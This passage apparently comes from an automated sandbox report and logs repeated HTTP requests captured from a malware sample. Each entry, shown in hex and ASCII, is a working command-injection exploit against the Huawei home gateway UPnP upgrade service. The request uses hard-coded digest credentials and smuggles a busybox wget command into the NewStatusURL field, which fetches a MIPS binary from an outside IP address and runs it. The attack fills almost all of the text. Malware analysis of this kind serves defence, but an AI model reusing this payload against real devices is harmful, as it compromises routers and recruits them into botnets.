/Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
